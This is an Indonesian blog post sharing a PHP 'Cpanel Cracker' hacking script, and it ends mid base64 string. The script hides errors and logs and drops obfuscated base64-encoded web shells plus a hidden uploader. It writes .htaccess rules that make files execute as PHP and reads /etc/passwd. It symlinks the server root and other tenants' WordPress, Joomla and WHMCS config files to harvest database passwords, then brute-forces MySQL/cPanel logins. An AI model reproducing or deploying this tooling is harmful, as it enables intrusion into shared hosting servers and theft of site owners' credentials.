Cpanel Cracker By Pekalongan Blackhat - Bagi Template
Cpanel Cracker By Pekalongan Blackhat

Jumat, 28 Februari 2014

Cpanel Cracker By Pekalongan Blackhat

, ,    Comment   


 Naufal Ardhani - Hallo babang, kali ini saya hanya membagikan script Cpanel Cracker by Pekalongan Blackhat, untuk tutorial crack cpanelnya silahkan cek di blog ini.

Screenshot :





Script :

<?php @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('output_buffering',0); @set_time_limit(0); @set_magic_quotes_runtime(0); ?> <html> <title>Cpanel Cracker by Pekalongan Blackhat</title> <body>  <STYLE>textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 10px;font-family: Tahoma; border: 1px solid #000000;} input{FONT-WEIGHT:normal;background-color: #105700;font-size: 10px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20 } body { font-family: Tahoma} .x-inj { font-family: Vivaldi} tr { BORDER: dashed 1px #333; color: #00ff; } td { BORDER: dashed 1px #333; color: #00ff; } .table1 { BORDER: 0px Black; BACKGROUND-COLOR: Black; color: #00ff; } .td1 { BORDER: 0px; BORDER-COLOR: #333333; font: 8pt Verdana; color: #00ff00; } .tr1 { BORDER: 0px; BORDER-COLOR: #333333; color: #00ff; } table { BORDER: dashed 1px #333; BORDER-COLOR: #333333; BACKGROUND-COLOR: Black; color: #00ff; } input { border: dashed 1px; border-color: #333; BACKGROUND-COLOR: Black; font: 8pt Verdana; color: #00ff; } select { BORDER-RIGHT:  Black 1px solid; BORDER-TOP:    #00ff 1px solid; BORDER-LEFT:   #00ff 1px solid; BORDER-BOTTOM: Black 1px solid; BORDER-color: #00ff; BACKGROUND-COLOR: Black; font: pt Verdana; color: #00ff; } submit { BORDER:  buttonhighlight 2px outset; BACKGROUND-COLOR: Black; width: 30%; color: #00ff; } textarea { border: dashed 1px #333; BACKGROUND-COLOR: Black; font: Fixedsys bold; color: #999; } BODY { SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #00ff; SCROLLBAR-SHADOW-color: #00ff; SCROLLBAR-3DLIGHT-color: #00ff; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #00ff; SCROLLBAR-DARKSHADOW-color: #00ff margin: 1px; color: #00ff00; background-color: Black; } .main { margin: -287px 0px 0px -490px; BORDER: dashed 1px #333; BORDER-COLOR: #333333; } .tt { background-color: Black; } A:link { COLOR: White; TEXT-DECORATION: none } A:visited { COLOR: White; TEXT-DECORATION: none } A:hover { color: #00ff00; TEXT-DECORATION: none } A:active { color: #00ff00; TEXT-DECORATION: none } </STYLE>   <?php @ini_set('display_errors', 0); @ini_set('output_buffering',0); echo "<center>  <img src='http://www.yakult.co.th/spaw2/uploads/images/pro.PNG'><br> <b><font color='#00ff00' class='x-inj' size='5'>Cpanel Cracker </font><br><br><br></b><b> <font size='3'> || <a href='?do=uploader'>./Uploader</a> | <a href='?do=config'>./Config</a> | <a href='?do=bhconfig'>./B-F Config Cpanel</a> | <a href='?do=brute'>./Cpanel BruteForce</a> ||</b><br><br><br></center></font><br> ";  if(isset($_REQUEST['do'])){ switch ($_REQUEST['do']){ ################php informasi case 'bhconfig'; echo "<center/><br/><b><font color=#00ff00>+--==[ B-F Config ]==--+</font></b><br><br>";   mkdir('bconfig', 0755);     chdir('bconfig');         $akses = ".htaccess";         $buka_lah = "$akses";         $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!");         $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-php .cpc ";         fwrite ( $buka , $metin ) ;         fclose ($buka); $confshell = 'PD9waHAgLyogfHwgSWRlYSA6OiBNci5BbHNhM2VrIHx8IFByb2dyYW1taW5nIDo6IEctQiB8fCBEZXNpZ25lciA6OiBBbC1Td2lzcmUgfHwgKi8kT09PMDAwMDAwPXVybGRlY29kZSgnJTY2JTY3JTM2JTczJTYyJTY1JTY4JTcwJTcyJTYxJTM0JTYzJTZmJTVmJTc0JTZlJTY0Jyk7JE9PTzAwMDBPMD0kT09PMDAwMDAwezR9LiRPT08wMDAwMDB7OX0uJE9PTzAwMDAwMHszfS4kT09PMDAwMDAwezV9OyRPT08wMDAwTzAuPSRPT08wMDAwMDB7Mn0uJE9PTzAwMDAwMHsxMH0uJE9PTzAwMDAwMHsxM30uJE9PTzAwMDAwMHsxNn07JE9PTzAwMDBPMC49JE9PTzAwMDBPMHszfS4kT09PMDAwMDAwezExfS4kT09PMDAwMDAwezEyfS4kT09PMDAwME8wezd9LiRPT08wMDAwMDB7NX07JE9PTzAwME8wMD0kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MTJ9LiRPT08wMDAwMDB7N30uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezE1fTskTzBPMDAwTzAwPSRPT08wMDAwMDB7MH0uJE9PTzAwMDAwMHsxfS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTR9OyRPME8wMDBPME89JE8wTzAwME8wMC4kT09PMDAwMDAwezExfTskTzBPMDAwTzAwPSRPME8wMDBPMDAuJE9PTzAwMDAwMHszfTskTzBPMDBPTzAwPSRPT08wMDAwMDB7MH0uJE9PTzAwMDAwMHs4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7OX0uJE9PTzAwMDAwMHsxNn07JE9PTzAwMDAwTz0kT09PMDAwMDAwezN9LiRPT08wMDAwMDB7MTR9LiRPT08wMDAwMDB7OH0uJE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHs4fTskT09PME8wTzAwPV9fRklMRV9fOyRPTzAwTzAwMDA9MHgxMDdjO2V2YWwoJE9PTzAwMDBPMCgnSkU4d01EQlBNRTh3TUQwa1QwOVBNREF3VHpBd0tDUlBUMDh3VHpCUE1EQXNKM0ppSnlrN0pFOHdUekF3VDA4d01DZ2tUekF3TUU4d1R6QXdMREI0TkdNMEtUc2tUMDh3TUU4d01FOHdQU1JQVDA4d01EQXdUekFvSkU5UFR6QXdNREF3VHlna1R6QlBNREJQVHpBd0tDUlBNREF3VHpCUE1EQXNNSGd4TjJNcExDZEZiblJsY25sdmRYZHJhRkpJV1V0T1YwOVZWRUZoUW1KRFkwUmtSbVpIWjBscFNtcE1iRTF0VUhCUmNWTnpWblpZZUZwNk1ERXlNelExTmpjNE9Tc3ZQU2NzSjBGQ1EwUkZSa2RJU1VwTFRFMU9UMUJSVWxOVVZWWlhXRmxhWVdKalpHVm1aMmhwYW10c2JXNXZjSEZ5YzNSMWRuZDRlWG93TVRJek5EVTJOemc1S3k4bktTazdaWFpoYkNna1QwOHdNRTh3TUU4d0tUcz0nKSk7cmV0dXJuOz8+fkRrcjlOSGVuTkhlbk5IZTF6ZnVrZ0ZNYVhkb3lqY1VJbWIxOW9VQXh5YjE4bVJ0d213SjRMVDA5TkhyOFhUekVYUkp3bXdKWExUMDlOSGVFWEhyOFhodE9OVDA4WEhlRVhIcjhQa3I4WFR6RVhUMDhYSHRJTFR6RVhIcjhYVHpFWFJ0T05UekVYVHpFWEhlRXBSdGZ5ZG1PbEZtbHZmYmZxRHlrd0JBc0thMDlhYXJ5aVdNa2VDME9MT01jdWMwbHBVTXBIZHIxc0F1bk9GYVl6YW1jQ0d5cDZIZXJaSHpXMVlqRjRLVVN2TlVGU2sweXRXME95T0xmd1VBcFJUcjFLVDFuT0FsWUFhYWNiQnlsRENCa2pjb2FNYzJpcERNc1NkQjV2RnV5WkYzTzFmbWY0R2JQWEhUd3pZZUEyWXpJNWhaOG1oVUxwSzJjamRvOXpjVUlMVHpFWEhyOFhUekVYaFRzbGZNeVNodE9OVHpFWFR6RVhUekVwS1g9PXRtWWxmeTkwREIxbGIyeHBkQmwwaGVFcEtYcGxGbWt2Rmw5WmNibnZGbU9wZE1GUEh0TDd0TWxNaG9sekYyYTBodE9nQXI5VGF5U21mYmtTazEwcGhiU2hrdWFaZHRFOXd0T2dBcjlUYXlTbWZia1NrMTA3dG0xbGR1WWxHWFBMZmJrU3dlMElrMmkwZnVFNlJaOTNmM0ZWa3pTaGdXcGxDMml2d3RGOHdBT05XMU9jQXJBSVV5T1lUZTRoTm9pMGRCWCt0anhQY0J5TE5JUDhmb2wwZG9BK1dKMW93cll2ZE1jcGMxOWpBb3lWY0JYOFIzT3Bmb3hsTklQOEYzTzVkb0FJZnVsWGNUMEpmb2E0ZnQ5akYzSEpOSVBoQ005TEdiU2h3dEVJZEJ5WmMybFZ3ZVBJQ2JhMGR6U2h3dEVJQ015akQyZlpkM2FWY3QxamQyeHZGalBqY2pjTVlNQzJLWFBJd3RuamQyeHZGalBJd3pIektUTDVLVFNod3RFSWNNOVZmdDFNQ0IxcGR1TDZ3dU9pRG85c0NVWEljMmFWY2JjaVJ0blNmQllwY29yU2R1YWpEQk9pd29mWkNCNUxjVVhJQ2JrcENCWFN3b2lsZHVjbGZvbGpDVVhJRjJ5VkZaMXpjYmtwY2pTaHd0RUljTTlWZnQxTUNCMXBkdUw2d2VyMEZ1STd0SkVJd3VPbEd1V3NDQnhwYzI0NndvWWxkbU9sRmpTaHd0RUl3b2N2ZG1Xc2YyYXBjMmkwS0puSmQyeEx3ZVNoZ1dQaERCNVhmYldTZm9hNGZveVpjQnJTRjJhU2NCWTBHWHBNZDI1MFJiZmxEQmZQZmVQSUNNOVNjZVNoQzI5U2QzdzZ3dEhYSGVFWEhlRTd0TWt2Rk1PbEZqUElIYm40d3VZdmRvbEx3dFllVzBZZVcwSDd0TWtpQzJzbUZNOTFkTVdzQzI5U2QzdzZ3dWZQRGJPbEtYcFhDQk9MREI1bUtKRXpGdUk3dE1rdkZNT2xGSjFaQ0JPcGZiSDZ3ZWZYR2VTaGdXUGhEQjVYZmJXNmNNOWpmYlk3dElQSUNNOTRSYllQQ0JPdmZ6UElIdW40d2VuWEd0RTFGdUlJd3pFWEtBQzVPalNodG0waHcyY3ZkM09sRkpFSUdYUGhDMjlTZDN3Nnd0SFhIZUVYSGVFN3RNY3ZkbVdzY015c0RCeDVLSkV4WXVuNEtYcDBjYmkwUmJZUENCT3ZmelBJSHVuNHdlblhHdEV4RnVJSXd6RVhIZUVYSGVTaGNNOVZmdDEzY0JsbUR1VzZ3bzV2Rk0xaWRlU2hnV3BpR1hQSXd1T2xHdVdzY29hamQza2lmb2x2ZGpQSWRNOVZjVFNod3RuamQyeHZGalBqSHpIekh6SHpLWHA5dGpYdkYzTzVkb0ErdGpYdkRvYWljZTRoTm9rdmN1TCt0anhMRGJDSURCVzl3bU92ZDJYSk5JUDhVZXJJRjNPNWRvQTl3TVl2ZG85WktKRWpZZVcwWWVXMEtabjBjYmkwUmJZUENCT3ZmelBJSHVuNHdlblhHdEV4RnVJSXd6RVhIZUVYSHR3N2ZvYTRmdDFpZG9sbWRqUElDMmFWZm9hWkt6NXRSQUNJVzI5VmNNbG1iMllXQ0I1bGRlWHZVZXIrdGp4TWQza3N3bzFsZm9pdmNlMEpBcjlUYXR3K3RqeHBkbW4xZnRuVkNCMWxOVWsxRk1YSnd1TzVGb0E5d21PbEd1V0p3dWNpZHVhbE5Vd21SSk8xRk1YVmtad0lGMmw2Y1QwSlllRUp3dDgrdGp4cGRtbjFmdG4wR2JubE5Va3pmQmtzRGJXSnd1Y2lkdWFsTlVrVGZveVpmdEUrd0pFdk5JUDhSMmN2Rk0wK05va1p3dDgrTm9rWnd0OCtrelNoREJDUERiWXpjYldQa3k5V1QxWUFCWmYxRk1YbWJVTHBHWHBwY0pJaWNNbFNjYTltY2JPZ0MyOVZmb2FWZnVIUGt1YVpkdExwR1hwbEMyaXZ3dGZ5Rm1rdkZKNElVQjUyQ0J4cGN0bmFBTFhWa3pTaGdCYVNGMmE3dEpPaXdlMElIZVNoY005WmNCeWpEdGltY2JPZ2NveTBDVUlMZmJrU2hVbmlGWkVMREI1TWRabDd0TWxNaG94dmMybFZodE9wZE1jdkJ6bmZSdE9wZE1jdkJ6eWZoVWw3dE1hakRvOEl3anhKd3VZMEdCeGxOVUZJQzI5U2QzdzZ3dEg0SGVJWEtlRUlLWm4wY2JpMFJiWVBDQk92ZnpQWEZ1SUlIdW40d2V5WEd0RWpLZUU0SGVJWHdlU21ObFNxYlVuYUYyYVpkTXlzY1VFTXd5bmlGM1kzZDNrTHdlUDhSMncrd3RFOENKbnpmdWxTY1QwbXdvWXZkbzlaS0pFakhlRVhIcmNvd2VTSWZvYTRmdDF6RG95TGQzRjZIdW40d2VuWEd0RXhGdUlJd3pFWEhlbm9PSkU3a3o1ZGtvbFZjTTlkSHkxZk50OUpOSkU4Q0puemZ1bFNjVDBtd29ZdmRvOVpLSkVqVzBIWEhlRVhLWm4wY2JpMFJiWVBDQk92ZnpQWEZ1SUlIdW40d2V5WEd0RWpXMEhYSGVFWEtaRitCWk9wZE1jdkJ6eWZiVFh2Q2o0OENtd0lSejRKS1hQTENVU3FLWHA5dG0waGNCWVBkWkVKTm93SUYzTzVkb0E5a1puamQyeHZGalBJd3pJWEtlRTRIdEU3d3VPbEd1V3NGMmlpY285M0tqblhHdEVYRnVJSUhibjR3dEg0SGVJWEtlRUlLWkYrTm9pWk5KT2l3cllYQ0I1bGR0bm9kM2FWY29hTFJqeEpGSkV2Tkp3N3RtMGhnV3BsQzJpdnd0RjhDbXdJUno0OENtd0lSejQ4Q213SVJ6NDhDbXdJUno0OGNvbDJ3b2xMTlVrTWQyOTBjYndKTm14OHdybExjQnJJS2pQSVRid1ZXQnh6Q1RZbERabjhndG5XRk05bUZNeXNkQmxWY1pFNktKbnVSQXdJZ3VYSU9vYXpEQmZWY2J3SUtqUElXQlhzQTNmcEYza2x3dXg4d2VYdmNvbDJOSVA4UjJPcGZqNDhSMmt2Y3VMK3RqWHZEdU9zZGU0bUtYcE1mQjVqZm9sdmRKbmxHdElMQ1VYTENKWExmb2E0ZnRsN3RKT2xHdW5TZDJPbHdlMEljYmlYZG85TGNVSUxDVVhMZm9hNGZ0TDd0Sk9sR3VuU2QyT2x3ZTBJY2JpWGRvOUxjVUlMQ0pYTGNiaVhkbzlMY2FTeGJVTDd0bWtsZnVhWmRKRUxjYmlYZG85TGNhU1hiVFNoZ1dwTWZCNWpmb2x2ZEpuU2QyZnBkSklMZmJZbEZKWExGb3l6RlpsN3RKT2p3ZTBJV28xNUYzeVNiMll2ZE01bEMzV1BrMnh2QzJ5U0RvOXpmdEZTa3VhemNid1NrdW5pRjNIcEtYcHBjSklMQ1psN3RNMTVGM3lTYjJZU2QzWWxodE9qaFRTaEZNYTBmYmtWd3VPWmZCQTd0bTFsZHVZbEdYcFpjYk8xRk00SWNNeVNGMkE3dG0waGdXcE1mQjVqZm9sdmRKbm1jYk9nY295MENVSUxmYmtTaGJTaGtveVp3ZTBJQ2JrWkNiTFBrenJWZnVpMGtaWG1ISjUwR3VXbVJ0RnpSbU80ZnRGU2t6V1ZmdWkwa1pYbVlVNTBHdVdtUnRGMlJtTzRmdEZTa3pGVmZ1aTBrWlhtS3Q1MEd1V21SdEY1Um1PNGZ0RlNrekVWZnVpMGtaTDd0Sk96Rk1ISU5Vbk1EQnhsYjJmbGZ5OWpkMjUwY0I1MEZaSUxmYmtTaFRTaGtvY3Bkb2F6d2UwSWNiaVhkbzlMY1VJbU5vcklEdWtsY2owSmtaWExGM2tqaFRTaGtvT2lmb3JJTlVuaUZta2lHVUlwS1hwTWQza2xDQllQaHRPTURCeGxGWm5pRlpFTERCVzlOSk9NREJ4bGhiU2hEQkNQa29sTHdlMDl3ZUVwR1hwamQyNTBEQjUxY1RTaGdXUExjTWxTY1VFOXdvYTRGb3h2Y29BUGtadytrWlhMY01sU2NVTDd0Sk9NREJ4bHdlMElmdWtwZFVJTGNNbFNjYVNYYlVMN3RNbE1odHlsRk1hbURVSW1SbU80ZnRGU2tvY3Bkb0FwaGJTaEMyOVZmb2xWZkJBN3RtMGhrdVlaQ1pFOXdvY3Bkb2FnYzJhMGIyWXZkbU9sZG1Pemh0d0xmYmtTUlpPTURCeGx3Skw3dE1sTWh0ckxGM2tqaGJTaEMyOVZmb2xWZkJBN3RtMGhrdWF6Y2J3SU5VbnpmdWtnRk1hWGRveWpjVUlMQ2J3U2taRlNrb2NwZG9BcEtYUExmYllsRkpFOXd1WTBGbDlaY2JuU0NCWWxodE9pRkpYbWtaWExmYllsRko0bVJtTzRmdEZwS1hQTGZiWWxGSkU5d3VZMEZsOVpjYm5TQ0JZbGh0T2lGSlhta1pYTGZiWWxGSjRtUm1PNGZ0RnBLWFBMZmJZbEZKRTl3dU9aREIwUEYzT1piM2tsRm94aUMyQVBrWjUwR3VXbVJ0Rm1SdE8xRjJhWmhVTDd0TWxNaG9hWmNCZnBodGtiZDNrTEF1a2xGM0hKUnRPekZNSHBoYlNoa3VuaUYzSElOVW5sR3RJSmNvYU1EQjVsaHRmcldsOVdXYVlUYTA5VU90RlN3dEZKUnR3bWhUU0pSdE96Rk1IcEtYUExjb3kwQ2FzZndlMElDYmtaQ2JMUGt1YXpjYndTa3VuaUYzSHBLWHA5Y0J4emNiU2hrdU92RDJhVkZaRTl3dU92RDJhVmIyZmxmeTlpZG9YUGt1WVpDWkw3dE1jdkZNYWlDMklQa3VPdkQyYVZGWm5pRlpFTGZvOXFjQjRwR1hwcGNKSWlrdU92RDJhVkJ6eWZoYlNoQzI5VmZvbFZmQkE3dG0waGt1T3ZEMmFWZE15c2NVRTl3dU92RDJhVmIyNWlkQkFQa3VPdkQyYVZCem5maFRTaERCQ1BrdU92RDJhVmRNeXNjVUVpTlVFbWF5OUJXYWtrV0FrSE9VRnBHWHBqZDI1MERCNTFjVFNoZ1dQTGZNeVp3ZTBJa3VPdkQyYVZCenlmS1hwcGNKaWxGTWFtRFVJbUZveXpGWkZTa3VjaUZKTHBHWFBMY0pFOXd1WTBGbDlaY2JuU0NCWWxodEZJa1pYbWtaeGxHdElMZk15WlJ0RjdrWlhMRjNramhVTDd0Sk9pd2UwSWZ1a3BkVWlsR3RJSk5VRkpSdHdtd0pYTGNKTHBLWFBMQ0pFOXd1T1pEQjBQY2JJUGtad21SdEZKa1pYTGNKTHBLWHBwY0pJTENVRWlOVUVta1psN3RKT1hDYll6d2UwSWtvcjd0bTFsZHVZbERCQ1Brb3dJd1QwSWtaRnBHWFBMRm95ekZaRTl3dE9KS1hwOXRNbE1odE9YQ2JZendlMDl3dEZtaGJTaEMyOVZmb2xWZkJBN3RtMGhrb09pZm95ZGJVRTl3b3laRk15NWh0TzFGMmFaUnRPWENiWXpoVFNoZ1dwOXRtMGhnV3BaY2JPMUZNNElrb09pZm9yN3RtMGhLWD09YWxWblJQSXE='; $file = fopen("bhc.php" ,"w+"); $write = fwrite ($file ,base64_decode($confshell)); fclose($file);     chmod("bhc.php", 0644); $indexshell = fopen("index.php" ,"w+"); $data = 'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+'; $tulis = fwrite( $indexshell, base64_decode($data)); fclose($indexshell);    echo "<iframe src=bconfig/bhc.php width=97% height=100% frameborder=0></iframe>"; break;  ################CMS DETECTOR case 'config'; $byphp = "safe_mode = Off   disable_functions = None   "; file_put_contents("php.ini",$byphp);  echo '<CENTER><b>+--=[ Config priv8 ]=--+</b><br><br>'; ?>  <bR><form method=post>  <textarea rows=20 cols=85 name=user><?php  $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; }  ?></textarea><br>  <input type=submit name=su value="Lets Start" /></form></CENTER>  <?php  error_reporting(0);  echo "<font color=#00ff size=2 face=\"comic sans ms\">";  if(isset($_POST['su']))  {  mkdir('Inject',0777); $rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $g = fopen('Inject/.htaccess','w'); fwrite($g,$rr); $indishell = symlink("/","Inject/root");       $rt="<a href=Inject/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";         echo "Please check link given below for / folder symlink <br><u>$rt</u>";    $dir=mkdir('INJECTION',0777);   $r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";         $f = fopen('INJECTION/.htaccess','w');          fwrite($f,$r);         $consym="<a href=INJECTION/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";         echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";           $usr=explode("\n",$_POST['user']);         $configuration=array("wp-config.php",   "wordpress/wp-config.php",   "web/wp-config.php",   "wp/wp-config.php",   "press/wp-config.php",   "wordpress/beta/wp-config.php",   "news/wp-config.php",   "new/wp-config.php",   "blogs/wp-config.php",   "home/wp-config.php",   "blog/wp-config.php",   "protal/wp-config.php",   "site/wp-config.php",   "main/wp-config.php",   "test/wp-config.php",   "wp/beta/wp-config.php",   "beta/wp-config.php",   "joomla/configuration.php",   "protal/configuration.php",   "joo/configuration.php",   "cms/configuration.php",   "site/configuration.php",   "main/configuration.php",   "news/configuration.php",   "new/configuration.php",   "home/configuration.php",   "configuration.php",   "SSI.php",   "forum/SSI.php",   "forum/inc/config.php",   "forum/includes/config.php",   "upload/includes/config.php",   "cc/includes/config.php",   "vb/includes/config.php",   "vb3/includes/config.php",   "cpanel/configuration.php",   "panel/configuration.php",   "ubmitticket.php",   "manage/configuration.php",   "myshop/configuration.php",   "beta/configuration.php",   "includes/config.php",   "lib/config.php",   "conf_global.php",   "inc/config.php",   "incl/config.php",   "include/db.php",   "include/config.php",   "includes/functions.php",   "includes/dist-configure.php",   "connect.php",   "mk_conf.php",   "config/koneksi.php",   "system/sistem.php",   "config.php",   "Settings.php",   "settings.php",   "sites/default/settings.php",   "smf/Settings.php",   "forum/Settings.php",   "forums/Settings.php",   "host/configuration.php",   "hosting/configuration.php",   "hosts/configuration.php",   "zencart/includes/dist-configure.php",   "shop/includes/dist-configure.php",   "whm/configuration.php",   "whmc/configuration.php",   "whmcs/configuration.php",   "whmc/WHM/configuration.php",   "whm/WHMCS/configuration.php",   "whm/whmcs/configuration.php",   "order/configuration.php",   "support/configuration.php",   "supports/configuration.php",   "oscommerce/includes/configure.php",   "oscommerces/includes/configure.php",   "shopping/includes/configure.php",   "sale/includes/configure.php",   "config.inc.php",   "amember/config.inc.php",   "clients/configuration.php",   "client/configuration.php",   "clientes/configuration.php",   "cliente/configuration.php",   "clientsupport/configuration.php",   "billing/configuration.php",   "billings/configuration.php",   "admin/conf.php",   "admin/config.php");   foreach($usr as $uss )   {    $us=trim($uss);     foreach($configuration as $c)    {     $rs="/home/".$us."/public_html/".$c;     $r="INJECTION/".$us." .. ".$c;     symlink($rs,$r);    }     }     } break; /////////////////////////////////// case'file';   break; ###################################  case 'brute';?> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php /* Recoded By Group XP */ @set_time_limit(0); @error_reporting(0);   if($_POST['page']=='find') { if(isset($_POST['usernames']) && isset($_POST['passwords'])) {     if($_POST['type'] == 'passwd'){         $e = explode("\n",$_POST['usernames']);         foreach($e as $value){         $k = explode(":",$value);         $username .= $k['0']." ";         }     }elseif($_POST['type'] == 'simple'){         $username = str_replace("\n",' ',$_POST['usernames']);     }     $a1 = explode(" ",$username);     $a2 = explode("\n",$_POST['passwords']);     $id2 = count($a2);     $ok = 0;     foreach($a1 as $user )     {         if($user !== '')         {         $user=trim($user);          for($i=0;$i<=$id2;$i++)          {             $pass = trim($a2[$i]);             if(@mysql_connect('localhost',$user,$pass))             {                 echo "Group XP   user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";                 $ok++;             }          }         }     }     echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by Group XP</b>";     echo "<center><b><a href=".$_SERVER['PHP_SELF']."><< BACK</a>";     exit; } } if($_POST['pass']=='password'){ @error_reporting(0); $i = getenv('REMOTE_ADDR'); $d = date('D, M jS, Y H:i',time()); $h = $_SERVER['HTTP_HOST']; $dir=$_SERVER['PHP_SELF']; $back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg=="; $file = fopen(".php","w+"); $write = fwrite ($file ,base64_decode($back)); fclose($file); chmod(".php",0755); mkdir('config',0755); $cp = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdI